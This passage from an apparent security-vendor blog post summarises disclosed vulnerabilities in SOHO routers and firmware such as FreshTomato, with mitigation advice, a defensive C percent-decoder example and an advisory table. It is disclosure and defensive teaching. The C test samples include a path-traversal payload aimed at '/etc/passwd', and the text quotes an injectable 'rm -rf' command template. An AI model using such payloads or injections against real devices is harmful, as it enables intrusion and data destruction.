_system_. An attacker could use this to craft a firmware update file that would result in arbitrary command injection during the update process. \n\n * **TALOS-2022-1578**: Talos discovered this vulnerability within the SSH-authorized key uploading feature within the web management interface of the R1510. An authenticated user could change their Linux username on the device. This created a directory path for the SSH keys used in certificate-based authentication. 
When a user uploaded a new SSH key, their username was used directly, without any validation, to build a directory path that was passed into a `_sysprintf_` function call, which would result in a command injection. An attacker could leverage a vulnerability to bypass authentication in the web interface, then continue to leverage this vulnerability to execute arbitrary commands within Linux.\n\n### Observations\n\nMost of the discovered vulnerabilities in the Robustel R1510 were related to a lack of user input sanitization. Ideally, a common code base would be used for many instances of checks across the device. If there was no specific performance requirement, these checks would occur multiple times throughout the process of uploading files and utilizing previously uploaded files. Using a common library to perform these checks would negate the risk of validation falling out of sync with checks elsewhere in the system.\n\n## **Sierra Wireless Airlink**\n\nResearch conducted by Carl Hurd.\n\n### Background\n\nTalos researchers chose to investigate the Sierra Wireless Airlink because of its deployment flexibility. The AirLink is intended for use in remote locations utilizing a cellular connection for local devices. The AirLink is managed out-of-band from the network provided by the device. Talos submitted 11 unique reports to Sierra Wireless, resulting in 13 CVEs. The research was focused on all aspects of the device, including the web server, custom console binary, SNMP and other exposed services on the device. If an attacker were to compromise this device, it would be possible to leverage the functionality of the device to manipulate traffic on all sides of the network.\n\n### Notable Vulnerabilities\n\n * **TALOS-2018-0751**: This vulnerability is contained within the web server ACEManager, which lacked a cross-site request forgery prevention header. 
These headers allow the server to check that requests originate from the same session in a coherent manner, rather than from a link in an unrelated browser context capitalizing on a pre-authenticated session. This vulnerability allows for the possibility of session hijacking using various methods.
 * **TALOS-2018-0750**: This vulnerability existed in the ping_result.cgi binary, which did not properly filter input before reflecting it back to the client. This improper filtering allowed JavaScript to be injected into the response to the client. This could be used to run code in the client's browser, such as making requests on behalf of the user or disclosing confidential tokens. Using this vulnerability in addition to TALOS-2018-0751 allowed for complete session hijacking of an authenticated user.
 * **TALOS-2018-0748**: Talos discovered this vulnerability within the file upload capability for templates within the AirLink 450. When uploading template files, a user can specify the name of the file being uploaded. There were no restrictions to protect the files currently on the device and used for normal operation. If a file was uploaded with the same name as a file that already existed in the directory, it inherited the permissions of that file. In this case, multiple CGI files could be overwritten with execute permissions. After replacing the file, an adversary could navigate to the newly uploaded CGI binary, and the code would be executed. By leveraging TALOS-2018-0751 and TALOS-2018-0750, the adversary could hijack an authenticated session of a user after uploading malicious code and executing it on command. This would result in fully unauthenticated remote code execution.

### Observations

Most of the findings on the Airlink 450 centered around the web server and the basic functionality it provides.
The lack of CSRF tokens provided by the web server and the reflected XSS vulnerability allow authenticated requests to be made by hijacking a user's session. A well-developed and tested web server should include CSRF protection automatically. The XSS can be mitigated by utilizing JavaScript libraries, or sanitization libraries if using CGI binaries, to sanitize user input properly. Finally, file upload functionality should be strictly limited to a folder that only contains user-uploaded files, to avoid permissions issues or file overwrites that could be used maliciously.

## **Siretta QUARTZ-GOLD**

Research conducted by Francesco Benvenuto.

### Background

The Siretta QUARTZ-GOLD was included in this research because the device is often deployed near critical devices, giving vulnerabilities an increased level of urgency. The device has a 4G/LTE failover mechanism for network uptime, which likely means the router is deployed on critical networks. Over the course of the research, Talos submitted [14 unique reports to Siretta, resulting in 62 CVEs](<https://blog.talosintelligence.com/vulnerability-spotlight-os-command-injection-directory-traversal-and-other-vulnerabilities-found-in-siretta-quartz-gold-and-freshtomato/>). The research of the Siretta QUARTZ-GOLD explored all aspects of the router that were accessible by default. This included the HTTP server, SNMP server implementation, and various command line interface (CLI) tools. The majority of the router firmware is a fork of FreshTomato, which is an open-source router firmware. By utilizing this firmware, the QUARTZ-GOLD inherits code reuse vulnerabilities from the project, just as many other projects that utilize the open-source codebase do.

### Notable Vulnerabilities

 * **TALOS-2022-1638**: This vulnerability existed in the M2M feature of the QUARTZ-GOLD. When the M2M feature was enabled, the m2m binary was executed.
This binary offered rich functionality through a custom UDP protocol, including a function called "DELETE_FILE", which would execute the command `rm -rf <base_folder>/<M2M_data_entry.data> &` through the `system` function. The `M2M_data_entry.data` portion of the command was specified in the UDP packet without any parsing or sanitization of the `M2M_data_entry.data` string. This functionality was vulnerable to command injection. Furthermore, the `DELETE_FILE` functionality did not require authentication. An unauthenticated attacker could use this vulnerability to achieve arbitrary command execution.
 * **TALOS-2022-1615**: This vulnerability existed in the SNMP functionality of the router. The QUARTZ-GOLD implemented a feature that allowed custom OIDs to be defined within the router. An attacker could submit a custom OID that would be executed whenever that OID was queried. The device's implementation simply executed these as commands directly in the Linux shell as the root user. An adversary could leverage this vulnerability to achieve arbitrary command injection.
 * **TALOS-2022-1610**: Talos discovered this vulnerability within the web server functionality of the QUARTZ-GOLD. By basing the firmware of this device on the FreshTomato firmware, many default features were inherited from FreshTomato that were not documented as part of the device functionality. More specifically, debug functionality was not disabled in FreshTomato and allowed a user authenticated to the web interface to issue direct Linux commands as if they had a shell. An authenticated attacker could use this vulnerability to achieve arbitrary command injection.

### Observations

The Siretta QUARTZ-GOLD inherited many of the discovered vulnerabilities from the third-party code base included in the product. FreshTomato includes many features that are prebuilt but could have been disabled if the manufacturer were more familiar with the code they were building from.
Much of the debugging functionality provided by FreshTomato is undocumented in the Siretta device and seems unintentionally included. When reusing large code bases, it is important to know exactly what is being included in that code base, and how it can be properly configured for the use case the developer has in mind.

## **Synology SRM - RT2600ac**

Research conducted by Claudio Bozzato.

### Background

The Synology RT2600ac is a high-end SOHO router that runs on Synology SRM (Synology Router Manager), a Linux-based operating system for all Synology routers. Talos researchers chose to look at this product because of its popularity and reputation for quality. We submitted nine reports to Synology, of which two affect their VPN service (QuickConnect), and one affects a Qualcomm tool used in SRM, eventually leading to the disclosure of 10 CVEs. QuickConnect is Synology's VPN service, which allows for managing routers remotely without requiring the configuration of the router to expose its management port and without having to manage DDNS services to locate the router remotely.

This research has been detailed in a dedicated [blog post](<https://blog.talosintelligence.com/vulnerability-spotlight-multiple-63063210e63ef5e7e1ec312c/>), which explains how Talos managed to chain some of the reported vulnerabilities to achieve remote code execution without prior authentication in SRM devices via Synology's VPN services, which are publicly accessible.

### Notable Vulnerabilities

 * **TALOS-2020-1064**: When routers connect to the QuickConnect VPN, they are placed in a dedicated subnet. This report demonstrates that the subnets are, however, not logically split, so it is possible to change the assigned netmask to a larger one, allowing one to talk with any other router connected to the same VPN. The VPNs are accessible by routers upon registration against QuickConnect.
But after initial registration, the router is not needed anymore, and the attack can be performed independently of the device. There are several VPNs available that are easily enumerable and seem to be geo-located.
 * **TALOS-2020-1066**: This report describes a vulnerability in the iptables rules within the router. SRM defines filtering rules that restrict access from the LAN to selected ports only. However, those rules are missing for connections that come from the QuickConnect VPN. This means that any service listening on the device is remotely accessible from the VPN. This can be used together with TALOS-2020-1064 to have unrestricted communication with any network service running on a chosen device among those reachable in the VPN.
 * **TALOS-2020-1065**: This report describes a vulnerability in Qualcomm's `lbd`, a service reachable via LAN on ports 7786 and 7787, which can be used without authentication to directly execute shell commands as root whenever an attacker is on the same LAN as the router. Since this is reachable via LAN, it is also reachable via the VPN. By chaining this vulnerability with the two above, it was possible to execute arbitrary commands as root via the VPN, without prior authentication, on any selected router connected to QuickConnect.

### Observations

Synology SRM provides a convenient VPN service to solve the remote management issue for SOHO routers running on a dynamic IP address. However, this research has shown that such services can also widen the attack surface. Devices exposed via DDNS normally take more effort to be discovered, usually requiring an internet-wide scan.
With QuickConnect, however, all devices are easily discovered as they're all connected to the same VPN, which is publicly accessible and whose geo-located services are easily enumerable.

## **TCL Linkhub Mesh Wifi**

Research conducted by Carl Hurd.

### Background

The TCL Linkhub is one of the newest products sold by TCL, and its feature set and price tag could mean a very rapid adoption rate, much like the budget TV market. Over the course of the research, Talos submitted 17 unique reports to TCL, resulting in 42 CVEs. The research on the TCL Linkhub Mesh Wi-Fi system was primarily focused on the API service that is used for all management of the device. The Linkhub does not use a web server to serve a user interface; instead, all interaction with the device is done through a phone application. This phone application interacts with the device through a ProtoBuffer-based API. This service is one of the few ports open by default and thus was the most interesting target for this research.

### Notable Vulnerabilities

 * **TALOS-2022-1463**: This vulnerability existed in the code for getting and setting values in the flash of the LinkHub. This vulnerability is interesting because it was not contained in a specific library and was used in almost every binary on the device. While getting values from flash, the function did not take into account the length of the destination buffer. An attacker could easily change a configuration value to a large value, and the next time that variable was loaded from flash, it would cause a buffer overflow. This vulnerability would lead to arbitrary code execution.
 * **TALOS-2022-1455**: This vulnerability existed in the API service that is exposed for use with the phone application. ProtoBuffer serialization is used for all communication with the device from the management application. Once the buffer is deserialized, it is dispatched to various handlers across the device.
Within the `set_mf_rule` functionality, a `memcpy` occurs whose length is determined directly by user input. Attackers could use this functionality to send an `mf_rule` message that contains fields larger than the statically sized buffers in the device. This vulnerability would lead to a buffer overflow and arbitrary code execution.
 * **TALOS-2022-1458**: This vulnerability existed in the API service that is exposed for use with the phone application. ProtoBuffer serialization is used for all communication with the device from the management application. Once the buffer is deserialized, it's dispatched to various handlers across the device. Within the `ucloud_add_node` functionality, which is used to add satellites to the router mesh, a `MxpManageList` message is passed directly into the `system` function. An attacker could use a malicious message to execute arbitrary commands using this vulnerability.

### Observations

The TCL LinkHub has a unique approach to management, which changes the attack surface significantly. Choosing to utilize Protobuffers for serialization is a good decision on the developer's part, as it is a well-tested and maintained library, but once the data is deserialized, much of the input is blindly trusted since it is assumed to come from the management application. All of this data should be treated as user data, and more validation should occur once deserialization occurs, prior to use in potentially dangerous functions such as `memcpy`.

## **TP-Link TL-R600VPN**

Research conducted by Jared Rittle and Carl Hurd.

### Background

The TP-Link TL-R600VPN became a subject of our research for its direct involvement in the VPNFilter campaign. The TP-Link TL-R600VPN is a five-port SOHO router. This device contains a Realtek RTL8198 integrated system on a chip. This particular chip uses an offshoot of the MIPS-1 architecture developed by Lexra.
This device is a fairly run-of-the-mill small router and contains network diagnostic capabilities and basic router functionality that is managed by a web server on the device. This research led to four Talos reports to TP-Link, resulting in four CVEs. For a more in-depth look at the research done on this device, refer to the corresponding [blog post](<https://blog.talosintelligence.com/vulnerability-deep-dive-tp-link/>).

### Notable Vulnerabilities

 * **TALOS-2018-0620**: This vulnerability existed in the header parsing of HTTP requests within the web server. This vulnerability was triggered by sending a request to a specific subset of pages on the web server. Once the request was made, a statically sized buffer was used for the parsed headers. An attacker could use an abnormally long header entry to overflow the buffer and overwrite the return address. This vulnerability leads to arbitrary code execution.
 * **TALOS-2018-0619**: This vulnerability existed in the network debugging functionality of the device. The ping functionality of the R600-VPN contained a user-supplied parameter that was unchecked. An attacker could supply an abnormally long ping_addr parameter to overflow the statically sized buffer used to hold the value, in turn overwriting the return address. This vulnerability leads to arbitrary code execution.
 * **TALOS-2018-0618**: This vulnerability was contained within the HTTP server within the R600-VPN. The user-provided URL was parsed without regard for special character sequences such as "../" that navigate up a directory tree. Normally, special characters like this are removed or ignored in a URL and the directory navigation does not occur, but in the R600-VPN this navigation could be used to retrieve any file on the device. This vulnerability leads to sensitive information disclosure.

### Observations

Most of the findings on the TL-R600VPN centered around the web server and the functionality provided by it.
One of the simplest solutions to reduce risk is to integrate a well-tested web server instead of developing one from scratch or including untested code in the product. While some of the vulnerable code was within the web server itself, much of it was also added by the manufacturer for simple additional features, like network diagnostics. It is clear from this research that any added code needs to be reviewed to prevent these issues.

## **ZTE MF971R**

Research conducted by Marcin Noga.

### Background

The ZTE MF971R mobile router is one of the newest devices in the ZTE MF mobile router family. At least in Poland, it is a very popular device, and its popularity is due to the fact that it's being sold by, among others, major GSM providers, or even added as a gift to some of their products/services. Over the course of the research, Talos submitted seven reports to ZTE, resulting in seven CVEs. The research on the ZTE MF971R router was primarily focused on the web application/server that is used for all management of the device. We managed to find a set of vulnerabilities in Web APIs which, chained together, allowed us to create a one-click exploit giving us full remote access to the device. See our [deep dive whitepaper](<https://talosintelligence.com/resources/407>) for a more in-depth explanation.

### Notable Vulnerabilities

 * **TALOS-2021-1317**: This vulnerability is related to the implementation of CSRF protection/API restriction in the Web APIs. To communicate with a certain set of Web APIs, a request should be sent from the 127.0.0.1 address or the default router IP address, 192.168.0.1. This is verified by checking the HTTP Referer value.
Unfortunately, the way the check was implemented gives an attacker the possibility to bypass it by simply adding the string 127.0.0.1 in any part of a referrer URL and obtaining full access to API communication.
 * **TALOS-2021-1320**: Talos discovered this vulnerability within the implementation of the ADB_MODE_SWITCH Web API. A password parameter that is part of this API is not properly sanitized with respect to its length, which leads to a stack-based buffer overflow. The victim does not need to be logged in to be affected by this vulnerability. The only constraint an attacker needs to pass is a referrer check, which is easy to bypass and has been described in TALOS-2021-1317. This remote pre-auth stack-based buffer overflow gives an attacker full control when overwriting the return address and, as we demonstrated, can be turned into one-click remote code execution.

### Observations

The ZTE MF971R's security suffered for several reasons. Despite visible efforts to reduce access to certain Web APIs, it was still possible to bypass this mechanism, thus increasing the number of attack vectors. The main web server binary was not built with basic mitigations such as ASLR (Address Space Layout Randomization) and stack cookies, making the exploitation of existing vulnerabilities trivial. Improving security mechanisms in the aforementioned areas will reduce the number of attack vectors and make exploiting existing vulnerabilities, especially those without any authorization, more difficult or practically impossible.

# Common frameworks

The previous section talked about the specific routers that we investigated. However, some of these routers also ran specific software that is common to many routers: open-source firmware such as OpenWrt, FreshTomato, AsusWRT or DD-WRT. One router also ran a specific kernel module from KCodes.
As this software isn't specific to the vendors we discussed in the router sections, we're grouping the vulnerabilities we found together.

## **OpenWrt**

Research conducted by Claudio Bozzato.

### Background

OpenWrt is a Linux-based OS, primarily used on embedded devices to route network traffic. It's highly customizable and ships with a set of tools and libraries that have been optimized to run on hardware with limited resources. Due to this, OpenWrt is a common choice among SOHO routers.

### Notable Vulnerabilities

 * **TALOS-2019-0893**: This vulnerability affected the ustream-ssl library, a library that works as an SSL wrapper for OpenSSL, mbed TLS and wolfSSL. This issue describes how the library does not terminate the SSL connection immediately when a wrong certificate is supplied by an HTTPS server, allowing the client to send one request using any unverified certificate before terminating the connection. As OpenWrt uses this library for tools like `wget`, any functionality relying on it would be affected by this information leak when requesting any HTTPS URL, which could allow, in the worst case, an attacker to perform a man-in-the-middle attack and steal any sensitive information present in the request.

### Observations

Because the HTTPS connection eventually terminates with an error, this issue can easily go unnoticed. As OpenWrt is a platform that is easy to customize and write scripts for, such a vulnerability may affect a large number of users.

## **FreshTomato**

Research conducted by Francesco Benvenuto.

### Background

FreshTomato is a popular open-source firmware project. It is an actively maintained and modern firmware project that's widely used by multiple SOHO routers.
By default, it ships with several functionalities, e.g., SSH, VPN capabilities, Telnet, routing, etc.

### Notable Vulnerabilities

 * **TALOS-2022-1642**: This vulnerability existed in one of the functionalities provided by FreshTomato's HTTP server. The server provides a simple template language, and one of the templating functions reads the content of a file, named by the user, from a specific folder. Because no sanitization is performed and the file path is composed by concatenating the hard-coded path with the provided filename, this function is vulnerable to path traversal. An attacker with valid credentials could read any file in the file system.
 * **TALOS-2022-1641**: This vulnerability existed in one of the log-related functions provided by FreshTomato's HTTP server. The functionality allows users to find certain strings in the log file via OS commands. Because no real sanitization is performed on the user-controlled parameter, this function is vulnerable to OS command injection. An attacker could leverage this vulnerability to achieve arbitrary command injection.
 * **TALOS-2022-1509**: This vulnerability existed in the URL unescape functionality provided by FreshTomato's HTTP server. The unescape always assumes that there are two characters following the '%' character. However, this is not always the case, and the assumption opens the door to an out-of-bounds read and write.

### Observations

Because the FreshTomato project is the base for many routers, any vulnerability found in the software could have wide-ranging consequences.
We cannot fully gauge how the firmware is deployed and how much impact these vulnerabilities will have on the deployed routers.

## **Asuswrt and Asuswrt-Merlin New Gen, DD-WRT**

Research conducted by Francesco Benvenuto.

### Background

Like FreshTomato, Asuswrt, Asuswrt-Merlin New Gen and DD-WRT are the base firmware for several SOHO routers.

### Notable Vulnerabilities

 * **TALOS-2022-1511**: This vulnerability existed in the URL unescape functionality provided by the Asuswrt and Asuswrt-Merlin New Gen HTTP server. The unescape always assumes that there are two characters following the "%" character. However, this is not always the case and could lead to an out-of-bounds read and write.
 * **TALOS-2022-1510**: This vulnerability is in the URL unescape functionality provided by DD-WRT's HTTP server. The unescape always assumes that there are two characters following the "%" character; however, this assumption is incorrect and could lead to an out-of-bounds read and write.

### Observations

After our researchers discovered TALOS-2022-1509, we discovered [other software that was vulnerable to the same unescape pattern](<https://blog.talosintelligence.com/vulnerability-spotlight-how-code-re-use/>), including TALOS-2022-1511 in Asuswrt and Asuswrt-Merlin New Gen, and TALOS-2022-1510 in DD-WRT.

## **KCodes NetUSB.ko**

Research conducted by Dave McDaniel.

### Background

Some NETGEAR routers utilize a bespoke kernel module called NetUSB.ko from a Taiwanese company called KCodes. This module is custom-made for each device but contains similar functionality. The module shares USB devices over TCP, allowing clients to use various vendor-made drivers and software to connect to these devices in such a way that the client machine treats the remote device as a local USB device plugged into their computer.
The software used for NETGEAR routers is called NETGEAR USB Control Center, and it utilizes a driver called NetUSBUDSTcpBus.sys (on Windows) for communications.

### Notable Vulnerabilities

 * **TALOS-2019-0775**: Once the static AES key was recovered, an attacker could easily trigger a DoS or remote information disclosure using a single opcode after the handshake.
 * **TALOS-2019-0776**: Similar to TALOS-2019-0775, this vulnerability leaks memory. In this case, it leaks very useful memory such as stack boundary addresses, a pointer to a specific configuration function and, notably, the base address of the running kernel module NetUSB.ko. This could potentially be combined with other remote attacks that could leverage this data when designing a specific payload for the target.

### Observations

Many other products use NetUSB.ko. A previously disclosed vulnerability in 2015 led researchers to believe a flaw in this very kernel module potentially existed in as many as 92 products across multiple vendors. For this analysis, we utilized the R8000 hardware to test the R8000 version of NetUSB.ko (1.0.2.66) and the R7900 version (1.0.2.69), since both modules are compiled for the same kernel. Specifically, the information disclosed in TALOS-2019-0776 appears to be particularly useful for recovering sensitive memory addresses for payload generation, regardless of the architecture/operating system that uses the kernel module.

# Key observations

SOHO routers are generally valuable targets for adversaries due to their position within the network and wide adoption within common network deployments. Their relatively low cost, wide availability, ease of acquisition and user-friendly management features lead to these products being in many homes, small and home offices, warehouses, coffee shops and many other businesses. They are even deployed as gateways providing remote access to industrial environments.
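Several of the findings above share one root cause: bytes taken from a request are consumed on the assumption that they are well-formed. As an added example (not code from FreshTomato, Asuswrt, DD-WRT or any vendor covered here), the following C shows a percent-decoder that bounds-checks the way the unescape routines in TALOS-2022-1509, TALOS-2022-1510 and TALOS-2022-1511 did not, plus a post-decoding filename check of the kind missing in the path concatenation of TALOS-2022-1642 and the "../" handling of TALOS-2018-0618. All function names are hypothetical and the sample inputs are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Added example; not code from FreshTomato, Asuswrt, DD-WRT or any router
 * vendor. The pattern behind TALOS-2022-1509, -1510 and -1511 is an unescape
 * routine that, on seeing '%', reads the next two bytes unconditionally, so a
 * value ending in "%" or "%4" reads (and then writes) past the buffer. The
 * decoder below checks every access against the input and output lengths
 * instead. All function names are hypothetical. */

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hex_val(unsigned char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Percent-decode src (len bytes, need not be NUL-terminated) into dst
 * (dst_size bytes). Returns the number of bytes written, with dst
 * NUL-terminated, or -1 if the input is malformed or does not fit. */
long url_unescape_safe(const char *src, size_t len, char *dst, size_t dst_size)
{
    size_t in = 0, out = 0;

    if (dst_size == 0)
        return -1;
    while (in < len) {
        unsigned char c = (unsigned char)src[in];
        if (c == '%') {
            int hi, lo;
            if (len - in < 3)                 /* "%" or "%4" at end of input */
                return -1;
            hi = hex_val((unsigned char)src[in + 1]);
            lo = hex_val((unsigned char)src[in + 2]);
            if (hi < 0 || lo < 0)             /* "%zz" is not an escape */
                return -1;
            c = (unsigned char)((hi << 4) | lo);
            if (c == '\0')                    /* "%00" would truncate a C path */
                return -1;
            in += 3;
        } else {
            in += 1;
        }
        if (out + 1 >= dst_size)              /* no room for this byte + NUL */
            return -1;
        dst[out++] = (char)c;
    }
    dst[out] = '\0';
    return (long)out;
}

/* Check that a *decoded* name refers to exactly one entry inside a fixed
 * directory: non-empty, no path separators, not "." or "..". Run it after
 * decoding; checking the encoded form lets "%2e%2e%2f" through, which is the
 * hard-coded-path-plus-filename concatenation problem in TALOS-2022-1642 and
 * the "../" problem in TALOS-2018-0618. */
int is_safe_basename(const char *name)
{
    if (name == NULL || name[0] == '\0')
        return 0;
    if (strchr(name, '/') != NULL || strchr(name, '\\') != NULL)
        return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return 0;
    return 1;
}

/* 1 if raw decodes exactly to expected, or, when expected is NULL, if the
 * decoder correctly rejects raw. */
int decodes_to(const char *raw, const char *expected)
{
    char buf[64];
    long n = url_unescape_safe(raw, strlen(raw), buf, sizeof buf);
    if (expected == NULL)
        return n < 0;
    return n >= 0 && strcmp(buf, expected) == 0;
}

/* What a file-reading handler should do with a request parameter: decode,
 * then validate the decoded name. 1 = accept, 0 = reject. */
int filename_accepted(const char *raw)
{
    char name[64];
    if (url_unescape_safe(raw, strlen(raw), name, sizeof name) < 0)
        return 0;
    return is_safe_basename(name);
}

int main(void)
{
    /* Constructed sample values, not captured traffic. */
    const char *samples[] = { "log.txt", "my%20log.txt", "%2e%2e%2fetc%2fpasswd",
                              "..", "%4", "%", "%zz", "a%00b" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-24s -> %s\n", samples[i],
               filename_accepted(samples[i]) ? "accepted" : "rejected");
    return 0;
}
```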

Vulnerabilities in these routers can provide entry to a huge variety of targets, and the same vulnerability can be used for impact, meaning these routers are high-value targets for malicious actors.

The security posture of these lower-cost routers has improved over the last few years, but in general, security advice for these devices is the same as it has been in the past. Some of the important security tenets for manufacturers are:

 * Features and services should be disabled by default unless they are critical for the operation of the device.
 * WAN-side management should be deactivated by default.
 * Support modern security features such as TLS/SSL encryption and make sure they're implemented properly.
 * Never trust user input.
 * Keep third-party code up to date.
 * Audit or familiarize yourself with integrated code.
 * Don't rely on obscure and undocumented diagnostic features or credentials.

Each of the vulnerabilities discovered falls into one of these categories. Code quality is always going to be an additional concern, and the utilization of safe functions should always be enforced during development. Ideally, use static analysis tooling during development. This may not be financially viable for many products hoping to keep consumer costs low. In this case, lean on compiler warnings and any other methods of ensuring the highest code quality possible.

Simple changes to the development process can mitigate many of the worst effects of these issues. Memory corruption, one of the most glaring vulnerability classes, can be mitigated by using memory-safe languages (e.g., Rust and Go). If safe languages are not an option, vendors should make sure to implement as many mitigations as possible, both compiler-based and OS-based. Examples of these mitigations would be non-executable stacks and address space layout randomization (ASLR).

The next most helpful change involves defining user interaction boundaries.
Generic strings are notoriously difficult to parse or apply access controls to. By utilizing a well-defined API boundary, it is easier to validate user requests and input. The boundary also acts as an access control list to prevent a malicious user from executing arbitrary commands or providing input that would result in other unexpected behavior.

The most important security step a user of these devices can take is to assess each service present on the device. Verify that each running service is required for the day-to-day operation of the device, and disable all extraneous services. Services that cannot be disabled should be restricted to absolute minimal access or completely blocked using alternative methods, such as firewall rules to block traffic. During the acquisition process, if possible, basic research should be done to ensure the devices have sane, secure defaults enabled, such as the use of encrypted protocols for remote access and administration, if applicable. Start your assessment by reading the router user manual thoroughly, even before purchase. The quality of details concerning device features in a user manual is often indicative of the overall product quality.

While the security posture of SOHO routers has generally improved, many could benefit from low-cost mitigations that would drastically improve their security posture. Over the past few years, Talos has published 141 advisories covering 289 CVEs within 13 SOHO and industrial routers and six common frameworks. Talos vulnerability research is always driven by the mandate to protect Cisco customers, but we also aim to improve the security of all devices we research. All research has been publicly disclosed, after disclosure to the vendor, according to Cisco's vulnerability disclosure policy.
These disclosures directly result in vulnerability remediations that improve the security posture of anyone using these devices.

# Vulnerability List

This blog post included a summary of each router and a few select vulnerabilities. Below is a list of all the advisories Talos disclosed post-VPNFilter.

| Talos ID (Linked to Report) | CVE(s) | Product |
|---|---|---|
| [TALOS-2022-1511](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1511>) | CVE-2022-26376 | Asuswrt and Asuswrt-Merlin New Gen |
| [TALOS-2022-1592](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1592>) | CVE-2022-38393 | Asus RT-AX82U |
| [TALOS-2022-1590](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1590>) | CVE-2022-38105 | Asus RT-AX82U |
| [TALOS-2022-1586](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1586>) | CVE-2022-35401 | Asus RT-AX82U |
| [TALOS-2021-1361](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1361>) | CVE-2021-21913 | D-Link DIR3040 |
| [TALOS-2021-1285](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1285>) | CVE-2021-21820 | D-Link DIR3040 |
| [TALOS-2021-1284](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1284>) | CVE-2021-21819 | D-Link DIR3040 |
| [TALOS-2021-1283](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1283>) | CVE-2021-21818 | D-Link DIR3040 |
| [TALOS-2021-1282](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1282>) | CVE-2021-21817 | D-Link DIR3040 |
| [TALOS-2021-1281](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1281>) | CVE-2021-21816 | D-Link DIR3040 |
| [TALOS-2022-1510](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1510>) | CVE-2022-27631 | DD-WRT |
| [TALOS-2022-1642](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1642>) | CVE-2022-38451 | FreshTomato |
| [TALOS-2022-1641](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1641>) | CVE-2022-42484 | FreshTomato |
| [TALOS-2022-1509](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1509>) | CVE-2022-28664 - CVE-2022-28665 | FreshTomato |
| [TALOS-2022-1523](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1523>) | CVE-2022-25932 | InHand Networks InRouter302 |
| [TALOS-2022-1522](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1522>) | CVE-2022-29888 | InHand Networks InRouter302 |
| [TALOS-2022-1521](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1521>) | CVE-2022-28689 | InHand Networks InRouter302 |
| [TALOS-2022-1520](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1520>) | CVE-2022-26023 | InHand Networks InRouter302 |
| [TALOS-2022-1519](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1519>) | CVE-2022-30543 | InHand Networks InRouter302 |
| [TALOS-2022-1518](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1518>) | CVE-2022-29481 | InHand Networks InRouter302 |
| [TALOS-2022-1501](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1501>) | CVE-2022-26518 | InHand Networks InRouter302 |
| [TALOS-2022-1500](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1500>) | CVE-2022-26075 | InHand Networks InRouter302 |
| [TALOS-2022-1499](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1499>) | CVE-2022-26420 | InHand Networks InRouter302 |
| [TALOS-2022-1496](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1496>) | CVE-2022-27172 | InHand Networks InRouter302 |
| [TALOS-2022-1495](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1495>) | CVE-2022-26510 | InHand Networks InRouter302 |
| [TALOS-2022-1481](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1481>) | CVE-2022-26780 - CVE-2022-26782 | InHand Networks InRouter302 |
| [TALOS-2022-1478](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1478>) | CVE-2022-26042 | InHand Networks InRouter302 |
| [TALOS-2022-1477](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1477>) | CVE-2022-25995 | InHand Networks InRouter302 |
| [TALOS-2022-1476](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1476>) | CVE-2022-26002 | InHand Networks InRouter302 |
| [TALOS-2022-1475](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1475>) | CVE-2022-26007 | InHand Networks InRouter302 |
| [TALOS-2022-1474](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1474>) | CVE-2022-26020 | InHand Networks InRouter302 |
| [TALOS-2022-1473](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1473>) | CVE-2022-26085 | InHand Networks InRouter302 |
| [TALOS-2022-1472](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1472>) | CVE-2022-21182 | InHand Networks InRouter302 |
| [TALOS-2022-1471](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1471>) | CVE-2022-24910 | InHand Networks InRouter302 |
| [TALOS-2022-1470](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1470>) | CVE-2022-25172 | InHand Networks InRouter302 |
| [TALOS-2022-1469](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1469>) | CVE-2022-21238 | InHand Networks InRouter302 |
| [TALOS-2022-1468](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1468>) | CVE-2022-21809 | InHand Networks InRouter302 |
| [TALOS-2019-0776](<https://talosintelligence.com/vulnerability_reports/TALOS-2019-0776>) | CVE-2019-5017 | KCodes NetUSB.ko |
| [TALOS-2019-0775](<https://talosintelligence.com/vulnerability_reports/TALOS-2019-0775>) | CVE-2019-5016 | KCodes NetUSB.ko |
| [TALOS-2018-0625](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0625>) | CVE-2018-3953 - CVE-2018-3955 | Linksys E Series |
